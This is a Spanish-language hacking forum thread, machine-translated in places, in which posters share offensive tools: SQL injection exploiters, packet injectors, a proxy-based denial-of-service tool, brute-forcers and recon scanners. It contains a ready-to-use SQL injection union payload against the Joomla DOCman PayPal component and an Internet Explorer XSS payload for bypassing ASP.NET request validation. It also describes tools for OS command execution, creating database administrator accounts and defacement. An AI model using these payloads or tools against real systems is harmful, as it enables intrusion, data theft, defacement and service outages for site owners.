PHPmvs es un simple (tal vez no tan rápido) explotador SQLi, buscador de panel de administración, un escáner de vulnerabilidad de servidores, escáner de puertos, rastreador web, servidor web fuzzer (DOS) y buscador de panel de administración, sobre todo para un análisis "rápido" (puedes subirlo a su propio servidor y escanear múltiples sitios desde allí) lo único que se necesita para hacer que funcione es un servidor web con PHP y un navegador. Sólo hizo algunas "optimizaciones" y ha añadido una inyección de "Beta" PostgreSQL error basado debido a que era más fácil que Oracle consultas de unión.




Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias bro

Hola, les paso a dejar este script, escrito en perl
el cual cumple la funcion de sql injection, las imagenes lo dejaran mas claro ,



Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

HexInject ahora ha llegado a la versión 1.5 ( 21 de febrero 2013 ) y se han hecho algunos cambios. En particular, las características se han redistribuido entre múltiples herramientas , siguiendo la filosofía Unix.
hexinject sigue siendo el sniffer principal y el inyector.
prettypacket desmonta paquetes primas (recibido en su entrada estándar) e imprimir su campo. También puede imprimir ejemplos de paquetes (útil si desea conocer la estructura de una cabecera).
hex2raw convierte hexstring (el formato de texto utilizado por hexinject) de datos en bruto, y vice-versa. Un básico xxd herramienta.
packets.tcl es un falsificador paquete experimental, escrito en TCL. Se utiliza un formato de representación paquete simple basado en APD ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ). La salida de la herramienta puede ser canalizado a hexinject modo de inyectar prima .
Con esta nueva organización es más fácil para crear tuberías shell de gran alcance, incluyendo también las herramientas externas.
Introducción
HexInject es un muy versátil paquete inyector y sniffer , que proporcionan un marco de línea de comandos para el acceso a la red prima. Está diseñado para trabajar en conjunto con los demás utilidades de línea de comandos, y por esta razón se facilita la creación de scripts de shell de gran alcance capaces de leer, interceptar y modificar el tráfico de red de forma transparente.


En una sola línea, ¿por qué se tiene en cuenta hexinject? Porque es capaz de inyectar cualquier cosa en la red , y, para los protocolos TCP / IP, se calcula automáticamente el tamaño del paquete de suma de comprobación y campos. Hay pocas herramientas que proporcionan esta funcionalidad, y menos que se puede combinar con las utilidades de línea de comandos estándar. Pruébelo!

HexInject como sniffer
Hexinject se puede utilizar como sniffer cuando se proporcionan las opciones "-s". Se puede imprimir el tráfico de red en formato hexadecimal y tanto cruda.
Ejemplo: root @ retroceder-base # hexinject-s-i eth0 1C AF F7 6B 0E 4D AA 00 04 00 0A 04 08 00 45 00 00 3 C 9A 88 40 00 40 06 51 04 C0 A8 01 09 5B 05 32 79 45 01 C9 BB 5E 61 85 79 00 00 00 00 02 16 A0 D0 0D 2F 00 00 02 04 05 B4 04 02 08 0A 00 0D 22 EC 00 00 00 00 01 03 03 07 FF FF FF FF FF FF AA 00 04 00 0A 04 08 06 00 01 08 00 06 04 00 01 AA 00 04 00 0A 04 C0 A8 01 09 00 00 00 00 00 00 C0 A8 01 04 AB 00 00 03 00 00 00 AA 04 00 0A 04 60 03 22 00 0E 02 00 00 AA 00 04 00 0A 04 03 DA 05 00 00 00 00 00 00 00 00 00 AA 00 04 00 00 00 0A 00 00 02 AA AA FF FF FF FF FF FF AA 00 04 00 0A 04 08 06 00 01 08 00 06 04 00 01 AA 00 04 00 0A 04 C0 A8 01 09 00 00 00 00 00 00 C0 A8 01 04 Pero ¿qué pasa con la lectura en tiempo real de lo que pasa por la red? Por ejemplo se puede imprimir en formato legible algunos encabezados HTTP: root @ retroceder-base # hexinject-s-i eth0-r | cadenas | grep 'Host:' Host: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Host: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Host: s. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ... En este caso se debe utilizar el modo "descarga cruda". Con "cadenas" se extrae todo el texto legible desde la red, y entonces es fácil "grep" lo que necesitamos ...

HexInject como inyector
Hexinject se puede utilizar como inyector cuando se proporciona las opciones "-P". Se puede inyectar el tráfico de red en formato hexadecimal y tanto cruda.
Ejemplo: root @ dar marcha atrás de la base # eco "01 02 03 04" | hexinject-p-i eth0 producir el siguiente resultado en wireshark:


Sigue la Informacion y descarga AQUI: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola a todos, les paso a dejar esta herramienta:


Características:
Multi-plataforma.
Interfaz gráfica de usuario amigable.
Multiproceso.
Volcar.
Personaliza tus consultas
Crea tus plugins personalizados para automatizar ataques
Apoyado por hoy:
POST, GET, Cabeceras (User-Agent, Cookie, Referer, X-Forwarded-For, Custom Header ...)
MSSQL> = 2000 y MySQL> = 5.0
Métodos de inyección compatibles para hoy:
Error inyección basado.
Inyección basada en Unión (con subconsulta).
Blind (tiempo y basado booleano)




Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !

Bueno en el siguiente post se mostrara como evadir el request validation, una seguridad prestada por aplicaciones Web desarrolladas con .NET (asp.net), en que consiste, consiste en el filtrado de caracteres de tipo XSS (entre otros) si deseas saber mas del tema puedes verlo AQUI: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Continuando, al realizar un ataque XSS en una web asp protegida con "Request Validation", es comun obtener un mensaje como este:



Lo cual no es impedimento para nada xd, pero cabe mencionar que muchas Webmasters se confian de este tipo de seguridad y aveces omiten por completo la vulnerabilidad confiando en este filtro.

Bueno, como evadimos esto ?

Una forma encontrada por Zamir Paltiel, es abusar de la flexibilidad de lenguajes como HTML y Javascript + la tolerancia a fallos que tienen los navegadores para encontrar alguna forma "extraña" de ejecutar el script (en este caso Internet Explorer) de la siguiente forma:

<%tag style="foo:expression(alert('XSS'))" >

El tag "tag", con el símbolo porcentaje delante, es interpretado como un tag HTML correcto por Internet Explorer, por lo que es posible emplear las técnicas habituales, como por ejemplo utilizar el parámetro "style" para introducir la ejecución de un Alert en Javascript:



Saludos,

Mas info y fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

DomainHostingView es una utilidad para Windows que recoge una amplia información acerca de un dominio mediante una serie de consultas WHOIS y DNS, y genera un informe HTML que puede visualizarse en cualquier navegador Web.
incluye la información que se muestra en el informe de DomainHostingView: la empresa de alojamiento o centro de datos que aloja el servidor web, servidor de correo y el servidor de nombres de dominio (DNS) del dominio especificado, la fecha de creación / cambiado / expirar del dominio, el propietario del dominio, el registrador de dominio que registró el dominio, la lista de todos los registros DNS, y mucho más ...


Web : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Adquisición Forense Vista previa y Análisis - simplificado!

PALADIN es una modificación de la distribución Linux Live basada en Ubuntu que simplifica el proceso de creación de imágenes forenses de manera forense de sonido. PALADIN fue diseñado con el entendimiento de que muchos de los encargados de la creación de imágenes forenses no se siente cómodo con el uso de la línea de comandos, pero todavía quiere utilizar el poder de Linux. PALADIN también fue diseñado con el entendimiento de que muchas agencias o compañías tienen presupuestos limitados.

PALADIN  Características principales


Inicie PCs y Macs Intel estándar de manera forense de sonido (incluyendo la mayoría de los Macs Intel, incluida la MacBook Air)!
Imagen de varios formatos, incluyendo Perito (. E01), EWF2 (. EX01), Imagen de Apple Disk (. Dmg), RAW (. Dd), SMART y AFF!
Imagen directamente como un formato de disco virtual (. Vmdk)!
Cree clones de disco duro!
Crear dos imágenes forenses o clones al mismo tiempo en el mismo formato o diferente!
Simplificación de GUI Toolbox!
Rápido y ligero entorno de escritorio XFCE!
Imagen a través de una red!
Dar formato a cualquier unidad como NTFS, HFS +, FAT32, exFAT y EXT4!
Crear una imagen forense de sólo el Slack espacio no asignado, el espacio libre y archivo!
Limpie rápidamente (esterilizar), verificar y medios de hash!
De búsqueda y presentación a la prensa por nombre de archivo, palabras clave o tipos MIME!
Progress Live Viewer Log!
Capacidad para guardar los registros a cualquier destino!
Capacidad de crear una imagen forense solo o dividir archivos forenses imagen!
Administrador de discos permite una fácil visualización de todos los medios de comunicación conectados y su estado!
Disk Manager códigos de color volúmenes montados para facilitar su identificación!
Imagen Mounter permite el montaje de imágenes forenses en PALADIN!
Enhanced encontrar características que permiten la búsqueda de un volumen entero o un solo directorio!
Capacidad de búsqueda de varios directorios al mismo tiempo!
PALADIN ahora tiene algunas de las herramientas de código abierto más populares forenses en su pecho herramienta forense!
Capacidad para realizar exámenes forenses completos usando Autopsia / Sleuthkit o DFF!
Capacidad para recuperar las contraseñas de la memoria utilizando lanzamiento!
Capacidad para analizar los archivos de copia de seguridad mediante el Analizador de iOS iPhone!
y mucho, mucho más!

Caja de herramientas FORENSE - Incluye software de código abierto!


Clamscan
Bulk Extractor
Principal
Photorec
Bisturí
SQLite Database Browser
TrueCrypt
Autopsy Browser
DFF
Md5deep
Bendice Hex Editor
DC3DD
DCFLDD
Pasco
EML Visor
ReadDBX
ReadOE
ReadPST
Comienzo
ExifTool
LinkInfo
Log2Timeline
RifiUtii
IPDDump
Analizador de iPhone
Wireshark
Registro Ripper
Ser más astuto que

Para descargar Paladin, debemos registrarnos, luego de eso la descargamos desque aqui:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Mas info: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !

Hola a todos, les paso a dejar esta herramienta Dos, en realidad no me gusta
mucho el dos, pero es bueno tener nuestro Arsenal xd.

Descripción

Groper es una negación de código abierto de la herramienta de servicio escrito en Java. Funciona mediante el uso de proxies como bots. Groper puerto típico de uso: 1. Se puede utilizar para firewalls de referencia para IP prohibición de ataques DoS a un puerto específico. 2. Se puede utilizar para distorsionar la información de seguimiento de sitio web (como Google Analytics). 3. Se puede utilizar para distorsionar la página web hits (o visitas por día). 4. Se puede bajar solo (no agrupado o agrupado mal) servidores. Aunque Puerto Groper puede ser utilizado para ataques de denegación de servicio; tengo absolutamente ninguna responsabilidad u obligación por los que utilizan esta herramienta de forma. Todas las compilaciones después de 3,2 (incluyendo 3,2) requieren java 7. Groper Puerto v2 está construido con Java 6. Puerto Groper v1 está escrito en python y requiere Python 2.7 (versión exe no requiere Python 2.7 para ser instalado)


Características

Utiliza proxies como bots, por lo que no necesita un botnet para ataques DDoS
GUI simple y elegante
Independiente de la plataforma (probado sólo en Windows)
Multi-threaded (100% sensible GUI), construida según el modelo de evento Swings. GUI no se bloqueará en marcha, incluso cuando se ejecuta.
Puede spam / inundación de un sitio web para aumentar los accesos y / o distorsionar la información de seguimiento
Es capaz de negar el servicio en los servidores sin que se distribuyen
Capaz de elegir qué agente de usuario de las conexiones vienen de
Capaz de establecer el tiempo de espera de conexión
Validación lista Proxy
Configuración intuitiva y estadísticas de conexión
En la actualidad existe un acuerdo para usar este software (no intrusiva). El uso del software implica que usted ha leído y acepta el acuerdo.

Para abrirlo pondremos, abrir con, otra aplicacion, comando personalizado, java -jar

Para efectuar un ataque debemos cargar algunos proxys

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

hola amigos, la siguiente herramienta esta escrita en python y cuenta con las siguientes
caracteristicas:


Aplicaciones Web Vuln Dorker / escáner para pentester amateur.

Cubierta LFI, RFI, SQLi y XSS
Buscador de Administración / login
subdominio buscador
en línea / fuera de línea galleta MD5
Apoderado
Búsqueda de IP local
Interfaz amigable


-[1]-  SQLi
-[2]-  LFI
-[3]-  XSS
-[4]-  RFI
-[5]-  Proxy
-[6]-  Admin Page Finder
-[7]-  Sub Domain Scan
-[8]-  Dictionary MD5 cracker
-[9]-  Online MD5 cracker
-[10]- Check your IP address



Web para descargas: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola a todos, bueno como ya es conocido hoy en dia
los PDF no son exactamente archivos con informacion e imagenes para nuestra lectura,
ya sabeis a lo que me refiero...
Bueno la siguiente herramienta peepdf nos ayudara en la tarea
de analisis de los archivos PDF

peepdf es una herramienta para explorar los archivos PDF con el fin de averiguar si el archivo puede ser dañino o no.

Las principales funcionalidades de peepdf son los siguientes:

Análisis

Decodificaciones: hexadecimales, octales, nombre objetos
Más filtros usados
Las referencias en los objetos y en donde se hace referencia a un objeto
Cadenas de búsqueda (incluidas las series)
Estructura física (offsets)
Estructura de árbol lógico
Metadatos
Modificaciones entre versiones (cambios)
Comprimido objetos (objetos corrientes)
Análisis y modificación de Javascript (Araña): unescape, reemplazar unirse
Shellcode análisis (wrapper sctest, Libemu)
Variables (conjunto de comandos)
La extracción de versiones anteriores del documento

Creación / Modificación

Básico de creación de PDF
Creación de PDF con Javascript ejecutado wen se abre el documento
Creación de flujos de objeto a comprimir los objetos
Embedded PDFs
Cuerdas y ofuscación nombres
PDF de salida con formato incorrecto: sin endobj, basura en la cabecera, la cabecera está mal ...
Filtros modificación
Objetos modificación

Usage: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login [options] PDF_file

Version: peepdf 0.1 r92

Options:
  -h, --help            show this help message and exit
  -i, --interactive     Sets console mode.
  -s SCRIPTFILE, --load-script=SCRIPTFILE
                        Loads the commands stored in the specified file and
                        execute them.
  -f, --force-mode      Sets force parsing mode to ignore errors.
  -l, --loose-mode      Sets loose parsing mode to catch malformed objects.
  -u, --update          Updates peepdf with the latest files from the
                        repository.
  -v, --version         Shows program's version number.
  -x, --xml             Shows the document information in XML format.


En Backtrack podemos encontrarlo en: cd /pentest/forensics/peepdf


Si deseas descargarlo aqui esta el link : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola a todos, paseando la internet
me encontre con esta  Herramienta muy util y compacta.

Su Nombre es MaxISploit, el cual se compone por Herramientas de
SQL inyeccion, Dork Scanner, Admin Finder & Xss Scan

Algunas Imagenes de la Herramienta a continuacion:

Bueno es un .exe por tanto para Windows, para hacerlo correr en Backtrack, daremos los permisos 777 (chmod 777)





Descarga : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Video:

WebSlayer es una herramienta diseñada para ataques de fuerza bruta aplicaciones Web, que puede ser utilizado para la búsqueda de recursos no vinculados (directorios, servlets, scripts, archivos, etc), la fuerza bruta parámetros GET y POST, bruteforce Formularios parámetros (usuario / contraseña), fuzzing, etc Las herramientas tiene un generador de carga útil y un analizador de resultados fácil y de gran alcance.

Puede llevar a cabo ataques como:
Predecible localizador de recurso, la recursividad soportado (Discovery)
Ingresar forma de fuerza bruta
Sesión de fuerza bruta
Parámetro fuerza bruta
Parámetro fuzzing y la inyección (XSS, SQL)
Autenticación básica y NTLM ataques de fuerza bruta

Características :
Recursión
Codificaciones: 15 codificaciones de apoyo
Autenticación: soporta NTLM y Basic
Cargas útiles múltiples: se puede utilizar 2 cargas útiles en diferentes partes
El soporte de proxy (autenticación compatibles)
Para la localización de recursos predecibles que tiene: recursividad, las extensiones comunes, la detección de códigos no estándar
Varios filtros para mejorar el rendimiento y para producir resultados más limpios
Filtros de directo
Multithreads
Sesión de ahorro
Navegador integrado (WebKit)
Retardo de tiempo entre solicitudes
Ataque de equilibrio a través de múltiples proxies
Diccionarios predefinidos para localización de recursos predecibles, basadas en servidores conocidos (gracias a Dark Raver)

Este sitio será utilizado para albergar los archivos del proyecto, y para la gestión de asuntos.



Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Web Oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El objetivo de este programa es reunir a mensajes de correo electrónico, subdominios, los anfitriones, los nombres de los empleados, puertos abiertos y las banderas de diferentes fuentes públicas como los motores de búsqueda, servidores y bases de datos de la clave PGP ordenador SHODAN.

Esta herramienta está diseñada para ayudar a los probadores de penetración en las primeras etapas de la prueba de penetración con el fin de entender la huella de cliente en Internet. También es útil para cualquier persona que quiere saber lo que un atacante puede ver sobre su organización.

Esta es una reescritura completa de la herramienta con nuevas características como:
Las demoras entre la solicitud

Todas las fuentes de búsqueda
Verificador de host virtual
Enumeración Activa (enumeración DNS, las búsquedas inversas, la expansión TLD)
Integración con la base de datos SHODAN ordenador, para obtener los puertos abiertos y pancartas
Guardar para XML y HTML
Gráfico básico con estadísticas
Las nuevas fuentes

Descubrimiento pasiva:

Google: motor de búsqueda de Google - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Google y los perfiles: motor de búsqueda de Google, búsqueda específica para los perfiles de Google

Bing: motor de búsqueda de Microsoft - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bingapi: motor de búsqueda de Microsoft, a través de la API (es necesario agregar la clave en el archivo de descubrimiento / You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)

Pgp: servidor PGP key - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Linkedin: google motor de búsqueda, búsqueda específica para los usuarios de Linkedin

Shodan: Computer Shodan motor de búsqueda, buscará los puertos y la bandera de los hosts descubiertos ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login )

Vhost: Bing hosts virtuales búsqueda

Descubrimiento activo:

DNS fuerza bruta: este plugin se ejecutará un bruto diccionario enumeración fuerza

Búsqueda DNS inversa: búsqueda inversa de IP ha descubierto con el fin de encontrar los nombres de host

DNS TDL expansión: TLD bruta diccionario enumeración fuerza

Por favor, lea el archivo README para obtener más información.

Última versión en el repositorio de subversion


Usage: theharvester options

       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for virtual hosts
       -f: Save the results into an HTML and XML file
       -n: Perform a DNS reverse query on all ranges discovered
       -c: Perform a DNS brute force for the domain name
       -t: Perform a DNS TLD expansion discovery
       -e: Use this DNS server
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
    -h: use SHODAN database to query discovered hosts
            google 100 to 100, and pgp doesn't use this option)

Examples:./theharvester.py -d You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -l 500 -b google
         ./theharvester.py -d You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin


Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Pangolin es una prueba de penetración, Inyección SQL herramienta de prueba de seguridad de base de datos. Encuentra Inyección SQL vulnerabilities.Its objetivo es detectar y tomar informarle de inyección SQL vulnerabilidades en aplicaciones web. Una vez que se detecta una inyección SQL en el host de destino, el usuario puede elegir entre una variedad de opciones para realizar un extenso back-end de gestión de base de datos de huellas dactilares sistema, recuperar usuarios DBMS sesión y base de datos, los usuarios enumerar, los hashes de contraseñas, privilegios, bases de datos, volcado tablas específicas enteras o usuario "s DBMS / columnas, ejecutar su propia sentencia de SQL, leer determinados archivos del sistema de archivos y mucho más.

Esta Hecha para windows, imgen:


Web Oficial para descargas y video demostraciones : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, cuenta con las siguientes opciones:

1) Automatic defacement:
Try to concatenate a string to all user-defined text fields in DB

2) Run OS shell command on DB server:
Run any OS command as if you're running a command console on the DB machine

3) Run SQL query on DB server:
Execute SQL commands of your choice

4) Enable OS shell procedure on DB:
Revive the good old XP_CMDSHELL where it was turned off
(default mode in MSSQL-2005)

5) Add administrative user to DB server with password: T0pSeKret
Automagically join the Administrators family on DB machine

6) Enable remote desktop on DB server:
Turn remote terminal services back on...

- Fixed nvarchar cast to varchar. Verified against MS-SQL 2000
- Added numeric / string parameter type detection
- Improved defacement content handling by escaping quotation marks
- Improved support for Linux systems
- Fixed the "invalid number of concurrent connections" failure due to non-parameterized URLs

Requerimientos:
* Python>= 2.4
* Pycurl (compatible with the above version of Python)
* Psyco (compatible with the above version of Python)

Mas Info sobre su uso: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola a todos, les paso a dejar una vulnerabilidad
en un complemento de Joomla llamado Docman Paypal, el cual salio
hace poco en 1337day, dicho complemento es de pago por tanto
me impidio a hacer un tutorial (hasta encontrar algun joomla con ese complemento)
pero si les traigo la Injeccion e Info:

#######################################################
#
#  Joomla Component DOCman PayPal <= (id) SQL injection Vulnerability
#
#######################################################
# Author : ByEge
# Author Blog : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Date : 28.03.2013
# Download script : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#######################################################
 
# test site vulnerability : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
 
# SQL Union Code : index.php?option=com_docmanpaypal&task=file&id=4+and+false+UnIOn+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,CHAR(60,104,49,62,66,121,69,103,101,60,104,49,62),44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65--
 
#######################################################

El complemente se puede encontrar en la siguiente web y esta disponible para
versiones de Joomla (hasta 2.5): You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
con un video tutorial de instalacion, sin mas que decir, disfrutenlo, Saludos !

PenTBox es una suite de seguridad, paquetes de seguridad y la estabilidad de las herramientas de prueba orientados a las redes y sistemas.
Programación en Ruby y orientado a GNU / Linux, aunque es compatible con Windows, MacOS y sistemas en los que cada Rubí trabaja.
Está libre, licenciado bajo GNU / GPLv3.

Algunas Caracteristicas de su Ultima version:

Nuevas características:
- Ejecución de comandos en gets (STDIN) implementado. (! Comandos)
- Honeypot ahora muestra IP del atacante y el puerto (thx Shyish)
. - Incluye las opciones de registro
. - Lista de palabras es más grande ahora
- Incluido "back" opción en los menús.
Nuevas herramientas:
- Incluido área nueva, herramientas Web.
- Incluido nuevo módulo de geolocalización dirección MAC (samy.pl).
- Incluido nuevo módulo HTTP directorio fuerza bruta.
- Incluido nuevo módulo HTTP comunes archivos de fuerza bruta.
- Incluido exploits para DOS
[otros / http] Conmutador 3Com SuperStack DoS
[otros / http] Los routers 3Com OfficeConnect DoS (Content-Type)
[windows / ftp] Windows 7 IIS7.5 Ftpsvc UNAUTH'D DoS
[windows / ftp] Solar FTP Server 2.1 DoS
[windows / pptp] MS02-063 PPTP con formato incorrecto de Control de Datos Kernel DoS
[windows / smb] Windows Vista / 7 SMB2.0 Negociar protocolo de petición DoS BSOD
- pb_update.rb incluido para actualizar PenTBox desde el repositorio SVN.
bugfixing:
-. Solucionado el problema con la API SHODAN
. - Eliminado l33t habla y el menú adicional
- mejorando la comprobación de permisos, ahora se hace por euid, no nombre de usuario (thx r4mosg)

Probando en Backtrack:




Web Oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Descarga para Linux: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos

Que es Netsparker?

Netsparker es el único falso positivo sin aplicación web escáner de seguridad. Simplemente apunte a su sitio web y automáticamente descubrir las fallas que podría dejar peligrosamente expuesta.

Tiene un periodo Gratis de 15 dias ya que es de pago, en realidad no se si habrá algun crack para
esta herramienta ya que no soy muy afiliado a Windows, si alguien sabe de algo agradecería lo diera a conocer.

Imagenes de la Herramienta:



Web Oficial para descargas: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !!

cierto, xd